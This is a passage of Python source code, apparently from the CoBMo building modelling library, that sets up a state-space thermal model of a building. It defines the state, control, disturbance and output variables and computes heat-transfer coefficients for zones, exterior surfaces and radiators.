connect_electric_grid (bool): If true, the output variable `grid_electric_power` will be defined to express the
total electric power demand at the electric grid connection point. Additionally, the control variables
`plant_thermal_power_cooling` / `plant_thermal_power_heating` will be defined to enable controlling how much
of the thermal demand is supplied through a local cooling / heating plant, hence translating the
thermal demand into electric demand.
connect_thermal_grid_cooling (bool): If true, the output variable `grid_thermal_power_cooling` will be defined
to express the thermal power cooling demand at the thermal cooling grid (district cooling system)
connection point. Additionally, the control variable `grid_thermal_power_cooling` will be defined to
allow controlling how much of the thermal demand is supplied through the thermal grid connection (as
opposed to supplying it through a local cooling plant).
connect_thermal_grid_heating (bool): If true, the output variable `grid_thermal_power_heating` will be defined
to express the thermal power heating demand at the thermal heating grid (district heating system)
connection point. Additionally, the control variable `grid_thermal_power_heating` will be defined to
allow controlling how much of the thermal demand is supplied through the thermal grid connection (as
opposed to supplying it through a local heating plant).
with_validation_outputs (bool): If true, additional validation output variables for the surface temperature,
surface exterior irradiation heat transfer and surface interior convection heat transfer will be defined.
Attributes:
scenario_name (str): CoBMo building scenario name.
states (pd.Index): Index set of the state variables.
controls (pd.Index): Index set of the control variables.
disturbances (pd.Index): Index set of the disturbance variables.
outputs (pd.Index): Index set of the output variables.
timesteps (pd.Index): Index set of the timesteps.
timestep_interval (pd.Timedelta): Timestep interval, assuming a constant interval between all timesteps.
state_matrix (pd.DataFrame): State matrix.
control_matrix (pd.DataFrame): Control matrix.
disturbance_matrix (pd.DataFrame): Disturbance matrix.
state_output_matrix (pd.DataFrame): State output matrix.
control_output_matrix (pd.DataFrame): Control output matrix.
disturbance_output_matrix (pd.DataFrame): Disturbance output matrix.
state_vector_initial (pd.Series): Initial state vector, describing the state variable values at
the first timestep.
disturbance_timeseries (pd.DataFrame): Disturbance timeseries.
electricity_price_timeseries (pd.DataFrame): Electricity price timeseries.
output_minimum_timeseries (pd.DataFrame): Minimum output constraint timeseries.
output_maximum_timeseries (pd.DataFrame): Maximum output constraint timeseries.
"""
scenario_name: str
states: pd.Index
controls: pd.Index
disturbances: pd.Index
outputs: pd.Index
timesteps: pd.Index
timestep_interval: pd.Timedelta
state_matrix: pd.DataFrame
control_matrix: pd.DataFrame
disturbance_matrix: pd.DataFrame
state_output_matrix: pd.DataFrame
control_output_matrix: pd.DataFrame
disturbance_output_matrix: pd.DataFrame
state_vector_initial: pd.Series
disturbance_timeseries: pd.DataFrame
electricity_price_timeseries: pd.DataFrame
output_minimum_timeseries: pd.DataFrame
output_maximum_timeseries: pd.DataFrame
def __init__(
self,
scenario_name: str,
timestep_start=None,
timestep_end=None,
timestep_interval=None,
connect_electric_grid=True,
connect_thermal_grid_cooling=False,
connect_thermal_grid_heating=False,
with_validation_outputs=False
):
# Store scenario name.
self.scenario_name = scenario_name
# Obtain building data.
building_data = (
cobmo.data_interface.BuildingData(
self.scenario_name,
timestep_start=timestep_start,
timestep_end=timestep_end,
timestep_interval=timestep_interval
)
)
# Store building data.
self.building_data = building_data
# Obtain total building zone area.
# - This is used for scaling air flow / power values to per-square-meter values.
self.zone_area_total = building_data.zones['zone_area'].sum()
# Define sets.
# State variables.
self.states = pd.Index(
pd.concat([
# Zone temperature.
building_data.zones['zone_name'] + '_temperature',
# Surface temperature.
building_data.surfaces_adiabatic['surface_name'][
building_data.surfaces_adiabatic['heat_capacity'] != 0.0
] + '_temperature',
building_data.surfaces_exterior['surface_name'][
building_data.surfaces_exterior['heat_capacity'] != 0.0
] + '_temperature',
building_data.surfaces_interior['surface_name'][
building_data.surfaces_interior['heat_capacity'] != 0.0
] + '_temperature',
# Zone CO2 concentration.
building_data.zones['zone_name'][
building_data.zones['fresh_air_flow_control_type'] == 'co2_based'
] + '_co2_concentration',
# Zone absolute humidity.
building_data.zones['zone_name'][
building_data.zones['humidity_control_type'] == 'humidity_based'
] + '_absolute_humidity',
# Radiator temperatures.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
] + '_radiator_water_mean_temperature',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
] + '_radiator_hull_front_temperature',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
] + '_radiator_hull_rear_temperature',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
& (building_data.zones['radiator_panel_number'] == '2')
] + '_radiator_panel_1_hull_rear_temperature',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
& (building_data.zones['radiator_panel_number'] == '2')
] + '_radiator_panel_2_hull_front_temperature',
# Storage state of charge.
pd.Series(['storage_state_of_charge']) if (
pd.notnull(building_data.scenarios.at['storage_type'])
) else None
]),
name='state_name'
)
# Control variables.
self.controls = pd.Index(
pd.concat([
# Electric / thermal grid connections and heating / cooling plants.
pd.Series([
'grid_electric_power',
'grid_thermal_power_cooling',
'grid_thermal_power_heating',
'plant_thermal_power_cooling',
'plant_thermal_power_heating'
]),
# Generic HVAC system.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_generic_type'])
] + '_generic_heat_thermal_power',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_generic_type'])
] + '_generic_cool_thermal_power',
# Radiator thermal power.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
] + '_radiator_thermal_power',
# AHU.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_ahu_type'])
] + '_ahu_heat_air_flow',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_ahu_type'])
] + '_ahu_cool_air_flow',
# TU.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_tu_type'])
] + '_tu_heat_air_flow',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_tu_type'])
] + '_tu_cool_air_flow',
# Vent.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_vent_type'])
] + '_vent_air_flow',
# Sensible storage cooling.
pd.Series([
'storage_charge_thermal_power_cooling',
'storage_discharge_thermal_power_cooling',
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'sensible_cooling'
) else None,
# Sensible storage heating.
pd.Series([
'storage_charge_thermal_power_heating',
'storage_discharge_thermal_power_heating',
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'sensible_heating'
) else None,
# Battery storage.
pd.Series([
'storage_charge_electric_power',
'storage_discharge_electric_power'
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'battery'
) else None
]),
name='control_name'
)
# Disturbance variables.
self.disturbances = pd.Index(
pd.concat([
# Weather.
pd.Series([
'ambient_air_temperature',
'sky_temperature',
'irradiation_horizontal',
'irradiation_east',
'irradiation_south',
'irradiation_west',
'irradiation_north'
]),
# Internal gains.
pd.Series(
building_data.zones['internal_gain_type'].dropna().unique() + '_internal_gain_occupancy'
),
pd.Series(
building_data.zones['internal_gain_type'].dropna().unique() + '_internal_gain_appliances'
),
pd.Series(
building_data.zones['internal_gain_type'].dropna().unique() + '_warm_water_demand'
),
# Constant, series of ones (workaround for constant model terms).
pd.Series(['constant'])
]),
name='disturbance_name'
)
# Output variables.
self.outputs = pd.Index(
pd.concat([
# Electric / thermal grid connections and heating / cooling plants.
pd.Series([
'grid_electric_power',
'grid_thermal_power_cooling',
'grid_thermal_power_heating',
'plant_thermal_power_cooling',
'plant_thermal_power_heating'
]),
# Generic HVAC system controls.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_generic_type'])
] + '_generic_heat_thermal_power',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_generic_type'])
] + '_generic_cool_thermal_power',
# Radiator controls.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
] + '_radiator_thermal_power',
# AHU controls.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_ahu_type'])
] + '_ahu_heat_air_flow',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_ahu_type'])
] + '_ahu_cool_air_flow',
# TU controls.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_tu_type'])
] + '_tu_heat_air_flow',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_tu_type'])
] + '_tu_cool_air_flow',
# Vent controls.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_vent_type'])
] + '_vent_air_flow',
# Sensible storage cooling controls.
pd.Series([
'storage_charge_thermal_power_cooling',
'storage_discharge_thermal_power_cooling',
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'sensible_cooling'
) else None,
# Sensible storage heating controls.
pd.Series([
'storage_charge_thermal_power_heating',
'storage_discharge_thermal_power_heating',
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'sensible_heating'
) else None,
# Battery storage controls.
pd.Series([
'storage_charge_electric_power',
'storage_discharge_electric_power'
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'battery'
) else None,
# Storage state of charge.
pd.Series(['storage_state_of_charge']) if (
pd.notnull(building_data.scenarios.at['storage_type'])
) else None,
# Zone temperature.
building_data.zones['zone_name'] + '_temperature',
# Zone CO2 concentration.
building_data.zones['zone_name'][
building_data.zones['fresh_air_flow_control_type'] == 'co2_based'
] + '_co2_concentration',
# Zone absolute humidity.
building_data.zones['zone_name'][
building_data.zones['humidity_control_type'] == 'humidity_based'
] + '_absolute_humidity',
# Zone fresh air flow.
building_data.zones['zone_name'] + '_total_fresh_air_flow',
# Validation outputs.
pd.concat([
building_data.surfaces_adiabatic['surface_name'][
building_data.surfaces_adiabatic['heat_capacity'] != 0.0
] + '_temperature',
building_data.surfaces_exterior['surface_name'][
building_data.surfaces_exterior['heat_capacity'] != 0.0
] + '_temperature',
building_data.surfaces_interior['surface_name'][
building_data.surfaces_interior['heat_capacity'] != 0.0
] + '_temperature',
building_data.surfaces_exterior['surface_name'] + '_irradiation_gain_exterior',
building_data.surfaces_exterior['surface_name'] + '_convection_interior'
]) if with_validation_outputs else None,
# Power balances.
pd.Series([
'electric_power_balance',
'thermal_power_cooling_balance',
'thermal_power_heating_balance'
])
]),
name='output_name'
)
# Obtain timesteps.
self.timesteps = building_data.timesteps
self.timestep_interval = building_data.timestep_interval
# Instantiate state space model matrix constructors.
state_matrix = cobmo.utils.MatrixConstructor(index=self.states, columns=self.states)
control_matrix = cobmo.utils.MatrixConstructor(index=self.states, columns=self.controls)
disturbance_matrix = cobmo.utils.MatrixConstructor(index=self.states, columns=self.disturbances)
state_output_matrix = cobmo.utils.MatrixConstructor(index=self.outputs, columns=self.states)
control_output_matrix = cobmo.utils.MatrixConstructor(index=self.outputs, columns=self.controls)
disturbance_output_matrix = cobmo.utils.MatrixConstructor(index=self.outputs, columns=self.disturbances)
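# Together these constructors assemble a state-space building model of the
# (continuous-time) form
#     dx/dt = A x + B u + D d,    y = C x + E u + F d,
# with states x, controls u, disturbances d and outputs y, where A, B, D are
# state_matrix, control_matrix, disturbance_matrix and C, E, F are
# state_output_matrix, control_output_matrix, disturbance_output_matrix
# (the letter names are illustrative only). The model definitions below add
# the individual coefficient contributions entry by entry.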
def define_initial_state():
"""Define initial value of the state vector for given definition in `initial_state_types`."""
# Instantiate.
self.state_vector_initial = (
pd.Series(
0.0,
index=self.states
)
)
# Zone air temperature.
self.state_vector_initial.loc[
self.state_vector_initial.index.isin(building_data.zones['zone_name'] + '_temperature')
] = (
building_data.scenarios.at['initial_zone_temperature']
)
# Surface temperature.
self.state_vector_initial.loc[
self.state_vector_initial.index.isin(
pd.concat([
building_data.surfaces_adiabatic['surface_name'] + '_temperature',
building_data.surfaces_exterior['surface_name'] + '_temperature',
building_data.surfaces_interior['surface_name'] + '_temperature'
])
)
] = (
building_data.scenarios.at['initial_surface_temperature']
)
# CO2 concentration.
self.state_vector_initial.loc[
self.state_vector_initial.index.isin(building_data.zones['zone_name'] + '_co2_concentration')
] = (
building_data.scenarios.at['initial_co2_concentration']
)
# Zone air absolute humidity.
self.state_vector_initial.loc[
self.state_vector_initial.index.isin(building_data.zones['zone_name'] + '_absolute_humidity')
] = (
building_data.scenarios.at['initial_absolute_humidity']
)
# Storage state of charge.
self.state_vector_initial.loc[
self.state_vector_initial.index.str.contains('storage_state_of_charge')
] = (
building_data.scenarios.at['initial_storage_state_of_charge']
)
def calculate_coefficients_zone():
"""Calculate zone parameters / heat transfer coefficients for use in, e.g., surface and radiator models."""
# Calculate zone air volume (equivalent to CO2 capacity).
building_data.zones['zone_volume'] = (
building_data.zones['zone_area']
* building_data.zones['zone_height']
)
# Calculate zone heat capacity (absolute heat capacity) from specific heat capacity.
building_data.zones['heat_capacity'] = (
building_data.zones['zone_volume']
* building_data.zones['heat_capacity']
)
# Calculate zone air mass (equivalent to moisture capacity).
building_data.zones['zone_air_mass'] = (
building_data.zones['zone_volume']
* building_data.parameters.at['density_air']
)
# Instantiate columns for parameters / heat transfer coefficients.
building_data.zones['zone_surfaces_wall_area'] = None
building_data.zones['zone_surfaces_window_area'] = None
building_data.zones['zone_surfaces_wall_emissivity'] = None
building_data.zones['zone_surfaces_window_emissivity'] = None
# Calculate zone parameters / heat transfer coefficients.
for zone_name, zone_data in building_data.zones.iterrows():
# Collect all surfaces adjacent to the zone.
zone_surfaces = (
pd.concat(
[
building_data.surfaces_exterior.loc[
building_data.surfaces_exterior['zone_name'].isin([zone_name]),
:
],
building_data.surfaces_interior.loc[
building_data.surfaces_interior['zone_name'].isin([zone_name]),
:
],
building_data.surfaces_interior.loc[
building_data.surfaces_interior['zone_adjacent_name'].isin([zone_name]),
:
],
building_data.surfaces_adiabatic.loc[
building_data.surfaces_adiabatic['zone_name'].isin([zone_name]),
:
]
],
sort=False
)
)
# Calculate parameters / heat transfer coefficients.
building_data.zones.at[zone_name, 'zone_surfaces_wall_area'] = (
(
zone_surfaces['surface_area']
* (1 - zone_surfaces['window_wall_ratio'])
).sum()
)
building_data.zones.at[zone_name, 'zone_surfaces_window_area'] = (
(
zone_surfaces['surface_area']
* zone_surfaces['window_wall_ratio']
).sum()
)
building_data.zones.at[zone_name, 'zone_surfaces_wall_emissivity'] = (
zone_surfaces['emissivity_surface'].mean()
)
# TODO: Ignore surfaces with no windows.
building_data.zones.at[zone_name, 'zone_surfaces_window_emissivity'] = (
zone_surfaces['emissivity_window'].mean()
)
def calculate_coefficients_surface():
"""Calculate heat transfer coefficients for the surface models."""
# Calculate absolute heat capacity from specific heat capacity.
building_data.surfaces_adiabatic['heat_capacity'] = (
building_data.surfaces_adiabatic['surface_area']
* building_data.surfaces_adiabatic['heat_capacity']
)
building_data.surfaces_exterior['heat_capacity'] = (
building_data.surfaces_exterior['surface_area']
* building_data.surfaces_exterior['heat_capacity']
)
building_data.surfaces_interior['heat_capacity'] = (
building_data.surfaces_interior['surface_area']
* building_data.surfaces_interior['heat_capacity']
)
# Instantiate columns for heat transfer coefficients.
building_data.surfaces_exterior['heat_transfer_coefficient_surface_sky'] = None
building_data.surfaces_exterior['heat_transfer_coefficient_surface_ground'] = None
building_data.surfaces_exterior['heat_transfer_coefficient_window_sky'] = None
building_data.surfaces_exterior['heat_transfer_coefficient_window_ground'] = None
# Calculate heat transfer coefficients.
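# - The radiative coefficients follow from a first-order linearization of the
#   Stefan-Boltzmann law sigma * emissivity * view_factor * (T1 ** 4 - T2 ** 4)
#   around the scenario's linearization temperatures, giving
#       h_rad = 4 * sigma * emissivity * view_factor * (T_lin + 273.15) ** 3
#   with T_lin taken as the mean of the exterior surface temperature and the
#   sky temperature (or the ambient air temperature, for the ground-facing
#   share weighted by (1 - sky_view_factor)).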
for surface_name, surface_data in building_data.surfaces_exterior.iterrows():
building_data.surfaces_exterior.at[
surface_name,
'heat_transfer_coefficient_surface_sky'
] = (
4.0
* building_data.parameters.at['stefan_boltzmann_constant']
* surface_data.at['emissivity_surface']
* surface_data.at['sky_view_factor']
* (
building_data.scenarios.at['linearization_exterior_surface_temperature']
/ 2.0
+ building_data.scenarios.at['linearization_sky_temperature']
/ 2.0
+ 273.15
) ** 3
)
building_data.surfaces_exterior.at[
surface_name,
'heat_transfer_coefficient_surface_ground'
] = (
4.0
* building_data.parameters.at['stefan_boltzmann_constant']
* surface_data.at['emissivity_surface']
* (1.0 - surface_data.at['sky_view_factor'])
* (
building_data.scenarios.at['linearization_exterior_surface_temperature']
/ 2.0
+ building_data.scenarios.at['linearization_ambient_air_temperature']
/ 2.0
+ 273.15
) ** 3
)
if pd.notnull(surface_data.at['window_type']):
building_data.surfaces_exterior.at[
surface_name,
'heat_transfer_coefficient_window_sky'
] = (
4.0
* building_data.parameters.at['stefan_boltzmann_constant']
* surface_data.at['emissivity_window']
* surface_data.at['sky_view_factor']
* (
building_data.scenarios.at['linearization_exterior_surface_temperature']
/ 2.0
+ building_data.scenarios.at['linearization_sky_temperature']
/ 2.0
+ 273.15
) ** 3
)
building_data.surfaces_exterior.at[
surface_name,
'heat_transfer_coefficient_window_ground'
] = (
4.0
* building_data.parameters.at['stefan_boltzmann_constant']
* surface_data.at['emissivity_window']
* (1.0 - surface_data.at['sky_view_factor'])
* (
building_data.scenarios.at['linearization_exterior_surface_temperature']
/ 2.0
+ building_data.scenarios.at['linearization_ambient_air_temperature']
/ 2.0
+ 273.15
) ** 3
)
def calculate_coefficients_radiator():
"""Calculate heat transfer coefficients for the radiator model."""
if pd.notnull(building_data.zones['hvac_radiator_type']).any():
# Instantiate columns for heat transfer coefficients.
building_data.zones['heat_capacitance_hull'] = None
building_data.zones['heat_capacitance_water'] = None
building_data.zones['thermal_resistance_radiator_hull_conduction'] = None
building_data.zones['thermal_resistance_radiator_front_zone'] = None
building_data.zones['thermal_resistance_radiator_front_surfaces'] = None
building_data.zones['thermal_resistance_radiator_front_zone_surfaces'] = None
building_data.zones['thermal_resistance_radiator_rear_zone'] = None
building_data.zones['thermal_resistance_radiator_rear_surfaces'] = None
building_data.zones['thermal_resistance_radiator_rear_zone_surfaces'] = None
# Instantiate additional columns for multi-panel radiators.
if (building_data.zones['radiator_panel_number'] == '2').any():
building_data.zones['thermal_resistance_radiator_panel_1_rear_zone'] = None
building_data.zones['thermal_resistance_radiator_panel_2_front_zone'] = None
# Calculate heat transfer coefficients.
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_radiator_type']):
# Calculate geometric parameters and heat capacity.
thickness_water_layer = (
zone_data.at['radiator_water_volume']
/ zone_data.at['radiator_panel_area']
)
thickness_hull_layer = (
# Thickness for hull on one side of the panel.
0.5 * (
zone_data.at['radiator_panel_thickness']
- thickness_water_layer
)
)
radiator_hull_volume = (
# Volume for hull on one side of the panel.
thickness_hull_layer
* zone_data.at['radiator_panel_area']
)
building_data.zones.at[zone_name, 'heat_capacitance_hull'] = (
radiator_hull_volume
* zone_data.at['radiator_hull_heat_capacity']
)
building_data.zones.at[zone_name, 'heat_capacitance_water'] = (
zone_data.at['radiator_water_volume']
* building_data.parameters.at['water_specific_heat']
)
# Calculate fundamental thermal resistances.
thermal_resistance_conduction = (
thickness_hull_layer
/ (
zone_data.at['radiator_hull_conductivity']
* zone_data.at['radiator_panel_area']
)
)
thermal_resistance_convection = (
1.0
/ (
zone_data.at['radiator_convection_coefficient']
* zone_data.at['radiator_panel_area']
)
)
temperature_radiator_surfaces_mean = (
0.5
* (
0.5
* (
zone_data.at['radiator_supply_temperature_nominal']
+ zone_data.at['radiator_return_temperature_nominal']
)
+ building_data.scenarios.at['linearization_surface_temperature']
)
)
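# Radiative resistances between the radiator panel and the zone surfaces,
# based on a two-surface enclosure network (radiator surface resistance,
# space resistance, wall surface resistance), linearized at the mean
# temperature above:
#     R_rad = ((1 / A_panel)
#              + (1 - e_panel) / (A_panel * e_panel)
#              + (1 - e_wall) / (A_wall * e_wall))
#             / (4 * sigma * T_mean ** 3)
# The front-side variant below uses the total zone wall area in the last
# term; the rear-side variant uses the panel area instead.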
thermal_resistance_radiation_front = (
(
(1.0 / zone_data.at['radiator_panel_area'])
+ (
(1.0 - zone_data.at['radiator_emissivity'])
/ (
zone_data.at['radiator_panel_area']
* zone_data.at['radiator_emissivity']
)
)
+ (
# TODO: Use total zone surface area and emissivity?
(1.0 - zone_data.at['zone_surfaces_wall_emissivity'])
/ (
zone_data.at['zone_surfaces_wall_area']
* zone_data.at['zone_surfaces_wall_emissivity']
)
)
)
/ (
(
4.0 * building_data.parameters.at['stefan_boltzmann_constant']
* (temperature_radiator_surfaces_mean ** 3.0)
)
)
)
thermal_resistance_radiation_rear = (
(
(1.0 / zone_data.at['radiator_panel_area'])
+ (
(1.0 - zone_data.at['radiator_emissivity'])
/ (
zone_data.at['radiator_panel_area']
* zone_data.at['radiator_emissivity']
)
)
+ (
# TODO: Use total zone surface area and emissivity?
(1.0 - zone_data.at['zone_surfaces_wall_emissivity'])
/ (
zone_data.at['radiator_panel_area']
* zone_data.at['zone_surfaces_wall_emissivity']
)
)
)
/ (
(
4.0 * building_data.parameters.at['stefan_boltzmann_constant']
* (temperature_radiator_surfaces_mean ** 3.0)
)
)
)
thermal_resistance_star_sum_front = (
0.5 * thermal_resistance_conduction * thermal_resistance_convection
+ 0.5 * thermal_resistance_conduction * thermal_resistance_radiation_front
+ thermal_resistance_convection * thermal_resistance_radiation_front
)
thermal_resistance_star_sum_rear = (
0.5 * thermal_resistance_conduction * thermal_resistance_convection
+ 0.5 * thermal_resistance_conduction * thermal_resistance_radiation_rear
+ thermal_resistance_convection * thermal_resistance_radiation_rear
)
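# The half conduction resistance, the convective resistance and the radiative
# resistance form a star (Y) network around the hull temperature node; the
# sums above are the numerator of the standard star-delta (Y-Delta)
# transformation,
#     R_ab = (R_a * R_b + R_b * R_c + R_c * R_a) / R_c,
# which yields the pairwise (transformed) resistances assigned below.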
# Calculate transformed thermal resistances.
building_data.zones.at[zone_name, 'thermal_resistance_radiator_hull_conduction'] = (
thermal_resistance_conduction
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_front_zone'] = (
thermal_resistance_star_sum_front / thermal_resistance_radiation_front
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_front_surfaces'] = (
thermal_resistance_star_sum_front / thermal_resistance_convection
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_front_zone_surfaces'] = (
thermal_resistance_star_sum_front / (0.5 * thermal_resistance_conduction)
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_rear_zone'] = (
thermal_resistance_star_sum_rear / thermal_resistance_radiation_rear
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_rear_surfaces'] = (
thermal_resistance_star_sum_rear / thermal_resistance_convection
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_rear_zone_surfaces'] = (
thermal_resistance_star_sum_rear / (0.5 * thermal_resistance_conduction)
)
if zone_data.at['radiator_panel_number'] == '2':
thermal_resistance_convection_fin = (
# Fin effectiveness is taken as a multiplier on the effective convective
# surface area, which reduces the convective resistance accordingly.
thermal_resistance_convection
/ zone_data.at['radiator_fin_effectiveness']
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_panel_1_rear_zone'] = (
0.5 * thermal_resistance_conduction
+ thermal_resistance_convection
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_panel_2_front_zone'] = (
0.5 * thermal_resistance_conduction
+ thermal_resistance_convection_fin
)
def define_heat_transfer_surfaces_exterior():
"""Thermal model: Exterior surfaces"""
# TODO: Exterior window transmission factor
for surface_name, surface_data in building_data.surfaces_exterior.iterrows():
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
# Conductive heat transfer from the exterior towards the core of surface
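# - The thermal mass of the surface is lumped at its core, so the conduction
#   resistance appears as two halves, hence the factor 2 in the denominators.
# - The gain factor of the series-resistance form
#       (1 + (h_ext_conv + h_ground + h_sky) / (2 * k_conduction)) ** (-1)
#   gives the fraction of the exterior-side heat exchange that is conducted
#   towards the core node (names here follow the parameters used below).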
disturbance_matrix[
f'{surface_name}_temperature',
'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
disturbance_matrix[
f'{surface_name}_temperature',
'ambient_air_temperature'
] += (
(
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
)
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
disturbance_matrix[
f'{surface_name}_temperature',
'sky_temperature'
] += (
surface_data.at['heat_transfer_coefficient_surface_sky']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
# Conductive heat transfer from the interior towards the core of surface
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{surface_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Share of the interior irradiation incident on the respective surface (wall-area fraction)
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
# Convective heat transfer from the surface towards zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Share of the interior irradiation incident on the respective surface (wall-area fraction)
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1))
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
f'{surface_name}_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
else: # Surfaces with neglected heat capacity
# Complete convective heat transfer from surface to zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
